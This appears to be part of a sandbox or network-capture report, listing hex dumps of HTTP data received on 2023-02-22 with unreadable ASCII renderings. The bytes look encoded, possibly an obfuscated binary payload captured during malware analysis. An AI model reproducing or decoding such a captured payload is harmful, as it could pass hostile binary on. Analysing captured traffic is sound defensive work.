                                                        2023-02-22 07:36:18 UTC43INData Raw: be c4 e8 0c c0 3a 30 be be c2 39 2b be be c2 44 d6 31 16 c0 be c4 e8 0c c0 3a 30 be be c2 39 2c be be c2 74 d8 31 16 c0 be c4 e8 0c c0 3a 30 be be c2 39 2b be be c2 45 d8 31 16 c0 be c4 e8 0c c0 3a 30 be be c2 39 2c be be c2 76 da 31 17 c0 be c4 e8 08 c0 3a 30 be be c2 39 2b be be c2 da 31 17 c0 be c4 e8 be 0c c0 3a 30 be be c2 39 2c be be c2 78 dc 31 92 c0 be c4 e8 0c c0 3a 30 be be c2 39 2b be be c2 2c dc 31 92 c0 be c4 e8 08 c0 3a 30 be be c2 39 2c be be c2 29 31 91 c1 be c4 e8 be 08 c0 3a 30 be be c2 39 2c be be c2 2a 31 8d c1 be c4 e8 be 0c c0 3a 30 be be c2 39 2b be be c2 34 2a 31 8d c1 be c4 e8 b4 e6 31 be be c8 dc fe d9 be be be f6 be be be be c0 2d cf c0 be c4 3a 3b be be c2 39 3a be be c2 31 07 c1 be c4 e8 c0 2d ce c0 be c4 3a 30 be be c2 39 2c
                                                        Data Ascii: :09+D1:09,t1:09+E1:09,v1:09+1:09,x1:09+,1:09,)1:09,*1:09+4*11-:;9:1-:09,
                                                        2023-02-22 07:36:18 UTC45INData Raw: be cf f6 47 be be be bc ca be be 03 bf be be be 2a be be be f6 25 be be be c1 2d b2 bf be c4 ce bf de be be be be e6 6d c0 be c4 f7 99 bd bd bd e4 de be be be be f6 8e bd bd bd c1 32 fb be be c0 c0 2d 41 c1 be c4 e8 31 f5 c2 be c4 38 c0 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2c be be c2 17 31 14 c0 be c4 e8 c1 2d a5 bf be c4 f7 8b bd bd bd f6 79 bd bd bd c1 2d a4 bf be c4 f7 a3 bd bd bd f6 7c bd bd bd c1 2d a9 bf be c4 f7 a3 bd bd bd f6 37 bd bd bd be be d1 ee c1 be 91 be be be bf be be cf de bf be be be bc cc be be f6 be be be be bc ca be be 03 c1 be be be 21 be be be 4e be be be 0a be be be f6 1c be be be c0 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2c be be c2 98 31 14 c0 be c4 e8 c1 2d a5 bf be c4 f8
                                                        Data Ascii: G*%-m2-A18:09,2:09,1-y-|-7!N:09,2:09,1-
                                                        2023-02-22 07:36:18 UTC46INData Raw: be be bc ca be be 03 c0 be be be 12 be be be 25 be be be f6 0d be be be c1 2d b2 bf be c4 ce bf de bf be be be e6 6c c0 be c4 f8 95 bd bd bd e4 f6 8b bd bd bd c0 3a 30 be be c2 39 2b be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 1a 31 15 c0 be c4 e8 c1 2d a5 bf be c4 f8 c3 be be be f6 f1 be be be c1 32 fb be be c0 c0 2d 4c c1 be c4 e8 31 f5 c2 be c4 38 c1 2d a4 bf be c4 f7 90 bd bd bd f6 69 bd bd bd c1 2d a9 bf be c4 f7 a3 bd bd bd f6 3c bd bd bd f6 93 bd bd bd de be be be be e6 6c c0 be c4 f8 16 bd bd bd e4 de be be be be f6 0b bd bd bd d1 ee c1 be 87 be be be bf be be cf de c0 be be be bc cc be be f6 be be be be bc ca be be 03 c1 be be be 28 be be be 42 be be be f5 be be be f6 23 be be be c0 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a
                                                        Data Ascii: %-l:09+2:09+1-2-L18-i-<l(B#:09,2:
                                                        2023-02-22 07:36:18 UTC47INData Raw: be be f6 be be be be c1 2d b2 bf be c4 ce bf f6 be be be be c1 2d a4 bf be c4 f7 76 bd bd bd f6 4c bd bd bd d1 ee c2 be 5a be be be bf be be cf f6 00 be be be bc ca be be 03 bf be be be 03 be be be f6 fe be be be c1 2d b2 bf be c4 ce bf de be be be be e6 6c c0 be c4 f8 99 bd bd bd e4 f6 8f bd bd bd c1 32 fb be be c0 c0 2d 59 c1 be c4 e8 31 f5 c2 be c4 38 c1 2d a9 bf be c4 f7 c3 be be be f6 7e bd bd bd c1 2d a4 bf be c4 f7 e8 be be be f6 be be be be c0 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2c be be c2 dd dd 1d 21 31 14 c0 be c4 e8 c1 2d a5 bf be c4 f7 68 bd bd bd f6 56 bd bd bd d1 ee c2 be 5a be be be bf be be cf f6 25 be be be bc ca be be 03 bf be be be c3 be be be f6 be be be be c0 3a 30 be be c2 39 2b be be c2 c1 32 f8 be be
                                                        Data Ascii: --vLZ-l2-Y18-~-:09,2:09,!1-hVZ%:09+2
                                                        2023-02-22 07:36:18 UTC49INData Raw: 3f bd bd bd e4 de c0 be be be f6 34 bd bd bd c0 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2c be be c2 bc c2 d4 bc bf e8 c1 e6 80 c0 be c4 f8 28 bd bd bd f6 19 bd bd bd be be be d1 ee c1 be 81 be be be bf be be cf de c0 be be be bc cc be be f6 be be be be bc ca be be 03 c1 be be be e0 be be be c3 be be be 21 be be be f6 db be be be c1 e6 7f c0 be c4 ce bf de be be be be e6 6c c0 be c4 f8 91 bd bd bd e4 f6 87 bd bd bd c1 2d a4 bf be c4 f8 c3 be be be f6 0f be be be c0 3a 30 be be c2 39 2b be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 bc c3 d4 bc bf e8 c1 e6 80 c0 be c4 f7 fa be be be f6 e8 be be be c1 2d a9 bf be c4 f7 72 bd bd bd de bf be be be e6 6d c0 be c4 f7 30 bd bd bd e4 f6 26 bd bd bd f6 89 bd bd bd f6 63 bd bd bd
                                                        Data Ascii: ?4:09,2:09,(!l-:09+2:09+-rm0&c
                                                        2023-02-22 07:36:18 UTC50INData Raw: 30 be be c2 39 2b be be c2 bc c3 e8 c1 2d a5 bf be c4 f8 82 bd bd bd f6 e3 be be be c1 2d a4 bf be c4 f7 a3 bd bd bd de be be be be e6 6d c0 be c4 f7 40 bd bd bd e4 de be be be be f6 35 bd bd bd f6 60 bd bd bd f6 4e bd bd bd c1 2d a9 bf be c4 f7 84 bd bd bd de bf be be be e6 6c c0 be c4 f8 11 bd bd bd e4 f6 07 bd bd bd be be be e4 3c 32 be be c2 d2 bc bf e8 be be d8 3c 32 be be c2 e8 be dc be e6 60 c3 be c4 e8 dc be e6 e6 c4 be c4 e8 e8 bc c7 be be 2d c4 c0 be c4 e8 be e8 bc c7 be be 2d c6 c0 be c4 e8 be e8 bc c7 be be 2d ff c0 be c4 e8 be fc be bc c7 be be bc c7 bf be e6 54 be be c8 e8 ec be bc c7 be be e6 e4 be be c8 e8 e8 bc c7 be be 2d c1 c0 be c4 e8 be fc be bc c7 be be bc c7 bf be e6 84 be be c8 e8 e8 bc c7 be be 2d c7 c0 be c4 e8 be e8 bc c7 be be
                                                        Data Ascii: 09+--m@5`N-l<2<2`---T--
                                                        2023-02-22 07:36:18 UTC51INData Raw: be a3 be be be fb be be cf f6 7c be be be bc ca be be 03 bf be be be c3 be be be f6 be be be be c0 e6 eb c1 be c4 e8 c0 2d cb c0 be c4 e8 c0 e6 ec c1 be c4 e8 c0 e6 9a c0 be c4 e8 c0 2d c4 c0 be c4 e8 c0 2d c5 c0 be c4 e8 c0 2d c6 c0 be c4 e8 c0 e6 ed c1 be c4 e8 c0 2d c8 c0 be c4 e8 c0 2d c9 c0 be c4 e8 c0 2d ff c0 be c4 e8 d8 4a 19 be be c0 2d f8 be be c8 31 79 be be c8 38 cf bf d5 17 03 ce be be be 33 bd bd bd 3a bd bd bd 41 bd bd bd 48 bd bd bd 4f bd bd bd 56 bd bd bd 17 bd bd bd 1e bd bd bd 64 bd bd bd 64 bd bd bd 25 bd bd bd 64 bd bd bd 64 bd bd bd 64 bd bd bd 2c bd bd bd 5d bd bd bd f6 c6 be be be c1 d1 bf f6 68 bd bd bd f6 52 bd bd bd de be be be be e6 e7 c1 be c4 f8 e8 bd bd bd e4 f6 de bd bd bd be be be d1 ee c1 be 09 c2 be be fa be be cf de c8
                                                        Data Ascii: |-------J-1y83:AHOVdd%ddd,]hR
                                                        2023-02-22 07:36:18 UTC53INData Raw: be bc cc bf be f6 be be be be bc ca bf be 03 c4 be be be 32 bf be be 73 bf be be 15 bf be be c3 be be be 4f be be be d3 bf be be f6 2d bf be be c1 c0 3a 3b be be c2 39 35 be be c2 e6 84 be be c8 e8 cf be 8e d1 be be bf e6 ef c1 be c4 e6 54 be be c8 f7 b8 be be be de c3 be be be f6 6a bd bd bd c1 c0 3a 3b be be c2 39 3a be be c2 e6 f1 c1 be c4 e8 cf be 8e 24 be be bf e6 ef c1 be c4 e6 54 be be c8 f7 d5 be be be f6 be be be be c1 c0 3a 3b be be c2 39 39 be be c2 e6 f2 c1 be c4 e8 cf be 8e d9 be be bf e6 e4 be be c8 e6 54 be be c8 f8 f5 be be be f6 ce bf be be c1 c0 3a 3b be be c2 39 36 be be c2 e6 7f be be c8 e8 cf be 8e 23 be be bf e6 e4 be be c8 e6 54 be be c8 f7 1c bd bd bd de c1 be be be f6 de bd bd bd c1 c0 3a 3b be be c2 39 38 be be c2 8f e6 84 be be
                                                        Data Ascii: 2sO-:;95Tj:;9:$T:;99T:;96#T:;98
                                                        2023-02-22 07:36:18 UTC54INData Raw: be be be be c0 2d da c0 be c4 3a 3b be be c2 39 3a be be c2 31 07 c1 be c4 e8 c0 e6 f7 c1 be c4 3a 30 be be c2 39 2c be be c2 28 31 07 c1 be c4 e8 be be b4 e6 31 be be c8 dc fe d9 be be be f6 be be be be c0 2d e2 c0 be c4 3a 3b be be c2 39 39 be be c2 31 09 c1 be c4 e8 c0 2d e0 c0 be c4 3a 30 be be c2 39 2b be be c2 2c 31 09 c1 be c4 e8 be be c1 ee c1 be 00 be be be be be be be f6 eb be be be c0 2d db c0 be c4 3a 3b be be c2 39 3a be be c2 31 07 c1 be c4 e8 c0 2d d9 c0 be c4 3a 30 be be c2 39 2c be be c2 28 31 07 c1 be c4 e8 e6 31 be be c8 dc fe 9c bd bd bd f6 81 bd bd bd be be a4 f6 e2 be be be c0 3a 3b be be c2 39 39 be be c2 31 09 c1 be c4 e8 c0 3a 3b be be c2 39 39 be be c2 46 2c 31 09 c1 be c4 e8 e6 f5 c1 be c4 dc fe a0 bd bd bd f6 8a bd bd bd be be
                                                        Data Ascii: -:;9:1:09,(11-:;991-:09+,1-:;9:1-:09,(11:;991:;99F,1
                                                        2023-02-22 07:36:18 UTC58INData Raw: e4 de be be be be f6 7e bd bd bd c1 e6 f8 c1 be c4 f7 8e bd bd bd f6 7c bd bd bd c0 3a 3b be be c2 39 39 be be c2 c1 32 fa be be c0 3a 3b be be c2 39 39 be be c2 bc c3 d4 bc bf e8 31 f5 c2 be c4 38 d1 ee c1 be 36 be be be bf be be cf f6 21 be be be bc ca be be 03 bf be be be e7 be be be f6 e2 be be be c0 3a 3b be be c2 39 3a be be c2 c1 32 fa be be c0 3a 3b be be c2 39 3a be be c2 bc c0 e8 31 f5 c2 be c4 38 c1 e6 fa c1 be c4 f7 ad bd bd bd f6 8a bd bd bd c1 2d b2 bf be c4 ce bf de be be be be e6 e7 c1 be c4 f8 65 bd bd bd e4 f6 5b bd bd bd c1 2d a9 bf be c4 f7 86 bd bd bd f6 91 bd bd bd d1 ee c1 be 36 be be be bf be be cf f6 d0 be be be bc ca be be 03 bf be be be f0 be be be f6 eb be be be c1 2d a9 bf be c4 f7 e0 be be be f6 be be be be c1 2d b2 bf be c4
                                                        Data Ascii: ~|:;992:;99186!:;9:2:;9:18-e[-6--
                                                        2023-02-22 07:36:18 UTC62INData Raw: be 8c be be be bf be be cf e6 60 c3 be c4 f6 be be be be e6 6f c1 be c4 f6 be be be be c0 e6 0c c0 be c4 f6 e1 be be be f6 9a bd bd bd bc ca be be 03 c2 be be be f3 be be be 04 be be be 42 be be be db be be be f6 ee be be be c0 d8 3b 2d be be c2 de bf be be be d5 f8 92 bd bd bd e4 f6 88 bd bd bd e8 c0 c1 2b 31 15 c0 be c4 3b 3e be be c2 de c0 be be be f6 74 bd bd bd c0 c1 31 91 c0 be c4 3b 3e be be c2 f6 df be be be e6 31 be be c8 dc fe 8b bd bd bd de be be be be d5 f8 4d bd bd bd e4 de be be be be f6 42 bd bd bd c0 c2 3b 3f be be c2 de c1 be be be d5 f7 30 bd bd bd e4 de c1 be be be f6 25 bd bd bd c0 c2 3b 3f be be c2 f6 be be be be e8 be be f0 c0 39 3e be be c2 e6 71 c1 be c4 e8 be be be e8 c0 2d c0 c0 be c4 d4 bc bf e8 be dc c0 e6 72 c1 be c4 e8 c8 d5
                                                        Data Ascii: `oB;-+1;>t1;>1MB;?0%;?9>q-r
                                                        2023-02-22 07:36:18 UTC63INData Raw: 32 fa be be c0 3a 3b be be c2 39 38 be be c2 31 7b be be c8 4a e6 be be bf e8 c0 39 3e be be c2 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 31 7a be be c8 4a 25 be be bf e8 31 f5 c2 be c4 38 c1 d2 e6 63 be be c8 f7 32 bd bd bd f6 5f bc bd bd c0 39 3e be be c2 32 fa be be c0 3a 3b be be c2 39 39 be be c2 31 8d be be c8 4a 25 be be bf e8 c0 39 3e be be c2 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 31 7a be be c8 4a 25 be be bf e8 c1 d2 e6 54 be be c8 f7 23 bc bd bd f6 f4 bc bd bd e6 31 be be c8 dc fe af bb bd bd f6 8a bb bd bd be be f0 c0 39 3e be be c2 e6 73 c1 be c4 e8 be be be f0 c0 39 3e be be c2 e6 77 c1 be c4 e8 be be be f0 c0 39 3e be be c2 e6 78 c1 be c4 e8 be be be f0 c0 39 3e be be c2 2d c6 c0 be c4 e8 be be be f0 c0 39 3e be be c2 e6 75 c1 be
                                                        Data Ascii: 2:;981{J9>2:09+1zJ%18c2_9>2:;991J%9>2:09+1zJ%T#19>s9>w9>x9>-9>u
                                                        2023-02-22 07:36:18 UTC68INData Raw: c1 2d a4 bf be c4 f7 4c be be be de bf be be be e6 68 c1 be c4 f8 65 bd bd bd e4 f6 5b bd bd bd c1 e6 87 c1 be c4 f7 93 bd bd bd de c0 be be be bc cc be be f6 42 bd bd bd e6 31 be be c8 dc fe eb be be be f6 be be be be c1 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 2c c0 2d ca c0 be c4 3a 3b be be c2 39 39 be be c2 99 31 09 c1 be c4 e8 c1 32 f8 be be c0 3a 30 be be c2 39 2b be be c2 c0 2d c8 c0 be c4 3a 30 be be c2 39 2b be be c2 99 2c 31 07 c1 be c4 e8 c1 e6 6a c1 be c4 f8 f5 bd bd bd f6 be be be be f6 1c be be be f6 e6 bd bd bd c1 32 fb be be c0 2d ca c0 be c4 3a 3b be be c2 39 39 be be c2 c0 e6 76 c1 be c4 3a 3b be be c2 39 39 be be c2 99 31 09 c1 be c4 e8 c1 32 fb be be c0 2d c8 c0 be c4 3a 30 be be c2 39 2b be be c2 c0 e6 79 c1 be c4 3a 30 be be c2
                                                        Data Ascii: -Lhe[B12:09+,-:;9912:09+-:09+,1j2-:;99v:;9912-:09+y:0
                                                        2023-02-22 07:36:18 UTC72INData Raw: 1c 2c 31 09 c1 be c4 e8 31 f5 c2 be c4 38 e6 6b c1 be c4 dc fe 80 bd bd bd de bf be be be e6 69 c1 be c4 f7 7d bc bd bd e4 f6 73 bc bd bd d1 ee c1 be 21 bf be be bf be be cf f6 c8 bf be be bc ca be be 03 c1 be be be c3 bf be be 3f be be be 32 be be be f6 be bf be be c1 2d a4 bf be c4 f7 83 be be be f6 cd bf be be c0 2d ca c0 be c4 3a 3b be be c2 39 3a be be c2 c1 32 fb be be c0 e6 76 c1 be c4 3a 3b be be c2 39 3a be be c2 1d 31 07 c1 be c4 e8 c0 2d c8 c0 be c4 3a 30 be be c2 39 2c be be c2 c1 32 fb be be c0 2d c8 c0 be c4 3a 30 be be c2 39 2c be be c2 1d 28 31 07 c1 be c4 e8 31 f5 c2 be c4 38 c1 2d b2 bf be c4 ce bf f6 42 bd bd bd c0 e6 76 c1 be c4 3a 3b be be c2 39 3a be be c2 c1 32 f8 be be c0 2d ca c0 be c4 3a 3b be be c2 39 3a be be c2 1d 31 07 c1 be
                                                        Data Ascii: ,118ki}s!?2--:;9:2v:;9:1-:09,2-:09,(118-Bv:;9:2-:;9:1
                                                        2023-02-22 07:36:18 UTC76INData Raw: 3a be be c2 c1 32 f8 be be c0 2d ca c0 be c4 3a 3b be be c2 39 3a be be c2 bc c0 e8 c0 2d c8 c0 be c4 3a 30 be be c2 39 2c be be c2 c1 32 f8 be be c0 3a 30 be be c2 39 2c be be c2 bc c0 e8 c1 2d a5 bf be c4 f7 7f be be be de be be be be e6 68 c1 be c4 f7 33 bd bd bd e4 de be be be be f6 28 bd bd bd c1 2d b2 bf be c4 ce bf de c0 be be be e6 68 c1 be c4 f8 11 bd bd bd e4 f6 07 bd bd bd f6 77 bd bd bd f6 be be be be e6 31 be be c8 dc fe 44 bd bd bd f6 17 bd bd bd c1 e6 89 c1 be c4 f8 a3 bd bd bd de bf be be be e6 68 c1 be c4 f8 d7 bd bd bd e4 f6 cd bd bd bd c0 e6 76 c1 be c4 3a 3b be be c2 39 3a be be c2 c1 32 fb be be c0 2d ca c0 be c4 3a 3b be be c2 39 3a be be c2 bc c0 e8 c0 2d c8 c0 be c4 3a 30 be be c2 39 2c be be c2 c1 32 fb be be c0 2d c8 c0 be c4 3a
                                                        Data Ascii: :2-:;9:-:09,2:09,-h3(-hw1Dhv:;9:2-:;9:-:09,2-:
                                                        2023-02-22 07:36:18 UTC80INData Raw: f8 c0 39 41 be be c2 74 d8 31 16 c0 be c4 e8 be f8 c0 39 41 be be c2 76 da 31 17 c0 be c4 e8 be f8 c0 39 41 be be c2 76 da 31 17 c0 be c4 e8 be f8 c0 39 41 be be c2 78 dc 31 92 c0 be c4 e8 be f8 c0 39 41 be be c2 78 dc 31 92 c0 be c4 e8 be fc c0 39 41 be be c2 29 dd c7 31 92 c1 be c4 e8 fc c0 39 41 be be c2 2a dd c8 31 90 c1 be c4 e8 f4 c0 39 41 be be c2 2a 31 8d c1 be c4 e8 be be c1 ee c1 be 00 be be be be be be be f6 eb be be be c0 2d cf c0 be c4 3a 3b be be c2 39 3a be be c2 31 07 c1 be c4 e8 c0 2d ce c0 be c4 3a 30 be be c2 39 2c be be c2 28 31 07 c1 be c4 e8 e6 31 be be c8 dc fe 9c bd bd bd f6 81 bd bd bd be be b4 e6 31 be be c8 dc fe d9 be be be f6 be be be be c0 2d d3 c0 be c4 3a 3b be be c2 39 39 be be c2 31 09 c1 be c4 e8 c0 e6 ec c2 be c4 3a 30
                                                        Data Ascii: 9At19Av19Av19Ax19Ax19A)19A*19A*1-:;9:1-:09,(111-:;991:0
                                                        2023-02-22 07:36:18 UTC84INData Raw: bd bd bd bc ca be be 03 bf be be be c3 be be be f6 be be be be e8 be d1 ee c1 be 07 be be be bf be be cf e6 60 c3 be c4 f6 be be be be e6 e6 c4 be c4 f6 be be be be c0 c1 e6 79 be be c8 de be be be be d5 f7 d2 be be be e4 de be be be be f6 c7 be be be f6 88 bd bd bd bc ca be be 03 bf be be be c3 be be be f6 be be be be e8 be be be dc be e6 60 c3 be c4 e8 e4 3c 47 be be c2 d2 bc bf e8 be be d8 3c 47 be be c2 e8 be d1 ee c2 be 49 be be be 02 be be cf de bf be be be bc cc be be f6 be be be be bc ca be be 03 c0 be be be f8 be be be 08 be be be f6 f3 be be be f6 e6 be be be f6 be be be be cf c0 2d f8 be be c8 dd 06 d1 bf d0 bf e6 ee be be c8 c0 39 49 be be c2 2d f8 be be c8 e6 fc c2 be c4 e8 cf c0 2d f8 be be c8 e8 c0 39 49 be be c2 f8 88 bd bd bd f6 79 bd bd
                                                        Data Ascii: `y`<G<GI-9I--9Iy
                                                        2023-02-22 07:36:18 UTC88INData Raw: be cf f6 d0 be be be bc ca bf be 03 bf be be be d3 be be be f6 ce be be be c1 e6 50 c2 be c4 f7 d5 be be be f6 f4 be be be cf be 39 56 be be c2 c0 39 56 be be c2 bc bf e8 d4 e8 d4 e8 c1 32 06 be be c0 d1 be de be be be be e6 4c c2 be c4 f7 75 bd bd bd e4 de be be be be f6 6a bd bd bd c1 33 06 be be c0 f7 8d bd bd bd f6 8c bd bd bd be be be d1 ee c1 be 33 be be be 0b be be cf f6 dd be be be bc ca bf be 03 bf be be be 17 be be be f6 12 be be be c1 32 06 be be c0 d1 be f6 ce be be be c1 2d a9 bf be c4 f7 d8 be be be f6 d5 be be be cf be 39 56 be be c2 c0 39 56 be be c2 bc bf d4 bc bf e8 d5 e8 d5 e8 c1 33 06 be be c0 f8 7f bd bd bd de be be be be e6 4d c2 be c4 f7 62 bd bd bd e4 f6 58 bd bd bd f6 95 bd bd bd f6 60 bd bd bd be be be f0 c0 2d b2 bf be c4 2d b1
                                                        Data Ascii: P9V9V2Luj332-9V9V3MbX`--
                                                        2023-02-22 07:36:18 UTC92INData Raw: de c2 be be be f6 50 bd bd bd c0 cf c2 d4 e6 9c c2 be c4 d1 c4 f6 f9 be be be c0 39 84 be be c2 d4 fd e9 c1 be be de c3 be be be f6 2a bd bd bd c0 d3 3b 84 be be c2 f6 7b c0 be be cf c3 f7 ce c0 be be de c4 be be be f6 0d bd bd bd d2 d1 c6 f6 ca be be be 31 a6 be be c8 d1 cb f6 99 bd bd bd cf cb 2d a7 be be c8 d1 c8 f6 3e be be be cf cb cf c3 2d 59 be be c8 de c8 be be be e6 b2 c2 be c4 f8 d3 bd bd bd e4 f6 c9 bd bd bd c1 d5 10 f6 ec c0 be be c0 cf c1 3b 80 be be c2 de bf be be be e6 b2 c2 be c4 f8 ae bc bd bd e4 de be be be be f6 a3 bc bd bd c0 c0 39 84 be be c2 3b 83 be be c2 de c9 be be be f6 8d bc bd bd c0 cf c2 cf c6 39 66 be be c2 39 68 be be c2 e6 99 c2 be c4 de c0 be be be bc cc c9 be f6 67 bc bd bd be f6 6e be be be de c2 be be be e6 b3 c2 be c4
                                                        Data Ascii: P9*;{1->-Y;9;9f9hgn
                                                        2023-02-22 07:36:18 UTC95INData Raw: be be 4a d0 be be ca ff be be 99 c9 be be 82 d6 be be 04 e6 be be f3 e2 be be e1 f2 be be e2 e5 be be 23 e4 be be 53 ec be be 18 06 be be 7e 0f be be 91 e2 be be a1 d7 be be e6 0a be be e7 f1 be be 11 f2 be be b4 e9 be be c2 06 be be 4c c8 be be 9c c3 be be 79 d9 be be e5 09 be be 8a d2 be be ce 0b be be 02 c3 be be 81 00 be be 4d ee be be e1 fe be be 69 e8 be be 2b c8 be be 34 c6 be be 7a 08 be be 02 c7 be be 5c 08 be be 7a f1 be be bd de be be f9 f5 be be a9 c5 be be 81 ff be be 96 bf be be e4 f6 be be c1 04 be be 5f fd be be f1 e3 be be fc 02 be be 2f df be be 4f 02 be be b6 f8 be be 2b eb be be fa f1 be be b6 e2 be be 8f ce be be 63 fc be be d7 f8 be be ab 0d be be 9b e6 be be 59 e5 be be 32 dd be be dd ec be be e3 ed be be a8 df be be 7e f4 be be 32
                                                        Data Ascii: J#S~LyMi+4z\z_/O+cY2~2
                                                        2023-02-22 07:36:18 UTC100INData Raw: cc 2d c9 c0 be c4 3a 30 be be c2 39 2b be be c2 d1 c7 f6 55 e5 be be cf cc 2d a5 bf be c4 f8 ed ca be be de 74 be be be e6 b2 c2 be c4 f8 78 ac bd bd e4 f6 6e ac bd bd d2 d1 de f6 8f f8 be be e8 31 f5 c2 be c4 38 c0 39 7e be be c2 e6 ba c2 be c4 e6 c4 c3 be c4 d1 cc f6 d0 b5 bd bd e8 c0 39 7e be be c2 2d 39 c3 be c4 e6 c4 c3 be c4 d1 cc de d6 be be be f6 2f ac bd bd cf cc f7 c8 ea be be de c0 be be be f6 1e ac bd bd d4 d1 c0 f6 10 eb be be 8e f4 be be c0 e6 bd c2 be c4 2d 4e be be c8 d1 d3 de bf be be be e6 b2 c2 be c4 f8 f6 ac bd bd e4 f6 ec ac bd bd f6 29 b7 bd bd de 98 be be be f6 e1 ac bd bd f6 bd c5 be be f6 9f f5 be be e8 c0 39 7e be be c2 2d 39 c3 be c4 e6 a3 c2 be c4 d1 cc de c1 bf be be f6 ba ab bd bd e8 cf cc f7 4f f5 be be de b7 be be be f6 a8
                                                        Data Ascii: -:09+U-txn189~9~-9/-N)9~-9O
                                                        2023-02-22 07:36:18 UTC104INData Raw: 2d 39 c3 be c4 d2 2d ae bf be c4 32 d3 be be bf d1 c4 de b6 be be be bc cc df be f6 01 9c bd bd cf c1 e6 ca c3 be c4 f7 64 c2 be be de 39 be be be f6 ef 9c bd bd c0 39 7e be be c2 2d 39 c3 be c4 e6 c4 c3 be c4 d1 cc de 25 be be be bc cc df be f6 cb 9c bd bd e8 31 f5 c2 be c4 38 c0 39 7e be be c2 e6 ba c2 be c4 d1 c1 f6 e1 bd bd bd f6 31 bd bd bd de f2 be be be f6 a7 9b bd bd f6 9b d7 be be f6 de d9 be be cf cc e6 de c3 be c4 f7 79 a3 bd bd de f1 be be be e6 b2 c2 be c4 f7 82 9b bd bd e4 de 97 be be be f6 77 9b bd bd cf c1 2d ac bf be c4 f7 e7 b3 bd bd f6 b3 e8 be be cf dc f7 88 d9 be be de 31 be be be e6 b2 c2 be c4 f8 50 9b bd bd e4 f6 46 9b bd bd cf c1 e6 ca c3 be c4 f7 43 ad bd bd de cc be be be e6 b3 c2 be c4 f8 2f 9b bd bd e4 de e4 bf be be f6 24 9b
                                                        Data Ascii: -9-2d99~-9%189~1yw-1PFC/$
                                                        2023-02-22 07:36:18 UTC108INData Raw: bd bd cf cc f8 dc af bd bd f6 c6 af bd bd cf c4 cf cc 2d c8 c0 be c4 3a 30 be be c2 39 2c be be c2 2d 91 be be c8 d1 c9 f6 14 db be be e8 31 f5 c2 be c4 38 c0 c0 39 85 be be c2 63 c8 be be bf d5 17 3b 82 be be c2 f6 2c b3 bd bd e8 c0 39 7e be be c2 2d 39 c3 be c4 e6 c4 c3 be c4 d1 cc f6 6c c6 be be 31 b8 be be c8 38 cf e0 cf de cf c9 2d 92 be be c8 f6 ee e1 be be e8 31 f5 c2 be c4 38 c0 39 85 be be c2 63 c8 be be bf d1 ce f6 80 a9 bd bd cf cc cf c1 e6 d1 c3 be c4 d1 d6 de d3 bf be be bc cc df be f6 f0 8b bd bd cf c5 cf d0 e6 bf c3 be c4 d1 de de e3 be be be bc cc df be f6 d7 8b bd bd cf c1 2d a9 bf be c4 f8 da 9b bd bd de f5 be be be f6 c5 8b bd bd cf c1 d2 2d ae bf be c4 d1 de de 75 be be be f6 b1 8a bd bd cf bf e6 b1 be be c8 d1 c9 f6 c3 dc be be c0 39
                                                        Data Ascii: -:09,-189c;,9~-9l18-189c--u9
                                                        2023-02-22 07:36:18 UTC112INData Raw: bd bd 4e bf be be f1 93 bd bd da cb be be 18 af bd bd 65 b8 bd bd e9 c5 be be 32 a0 bd bd c8 81 bd bd 4c b8 bd bd 09 c4 be be f1 c2 be be 8d 8e bd bd 69 ac bd bd 9f b8 bd bd c0 c4 be be 35 a6 bd bd 0c 8f bd bd 4e b0 bd bd 20 93 bd bd 20 cf be be 77 cc be be 8e c2 be be 69 ac bd bd 94 a3 bd bd 87 91 bd bd 27 93 bd bd dc ab bd bd e3 b0 bd bd 69 ac bd bd 92 94 bd bd c1 85 bd bd 69 88 bd bd e6 d0 be be 78 8b bd bd 86 c5 be be 6a 88 bd bd 06 84 bd bd 78 d0 be be c3 b8 bd bd 4a a0 bd bd e7 94 bd bd 77 a9 bd bd d6 a3 bd bd 0a d1 be be 4d c9 be be 90 8b bd bd 4e 96 bd bd 6f ac bd bd f2 ce be be b4 d1 be be 6d ab bd bd 50 8a bd bd 0f b0 bd bd 18 c7 be be 69 ac bd bd 0b 82 bd bd a0 86 bd bd 30 a3 bd bd 30 bf be be 9f b3 bd bd 47 8e bd bd 1d 9d bd bd 82 87 bd bd de
                                                        Data Ascii: Ne2Li5N wi'iixjxJwMNomPi00G
                                                        2023-02-22 07:36:18 UTC116INData Raw: be e6 b3 c2 be c4 f7 8b 6a bd bd e4 f6 81 6a bd bd c0 39 7e be be c2 cf c5 2d 65 be be c8 cf de e6 c1 c3 be c4 2d 37 c3 be c4 f6 ae 77 bd bd c0 39 7e be be c2 cf dc cf cc e6 e3 c3 be c4 2d 37 c3 be c4 de a1 be be be f6 49 6a bd bd cf d6 f8 83 a7 bd bd de 22 bf be be f6 38 6a bd bd cf d6 f7 c0 99 bd bd f6 04 79 bd bd cf c6 cf c0 58 33 03 be be c0 f7 5b aa bd bd de 57 be be be e6 b3 c2 be c4 f8 0e 6a bd bd e4 de c9 bf be be f6 03 6a bd bd cf cc 32 fb be be c0 2d 10 c1 be c4 d1 cb f6 15 be be be e8 31 f5 c2 be c4 38 c0 39 7e be be c2 2d 39 c3 be c4 d1 c1 f6 3c 88 bd bd cf cf 3c e0 be be c8 e6 44 be be c8 f7 b1 b3 bd bd f6 d4 7b bd bd c0 39 7e be be c2 cf cc 2d d1 c0 be c4 2d 37 c3 be c4 de ae be be be f6 a5 69 bd bd cf c3 f8 01 89 bd bd f6 f6 89 bd bd c0 39
                                                        Data Ascii: jj9~-e-7w9~-7Ij"8jyX3[Wjj2-189~-9<<D{9~--7i9
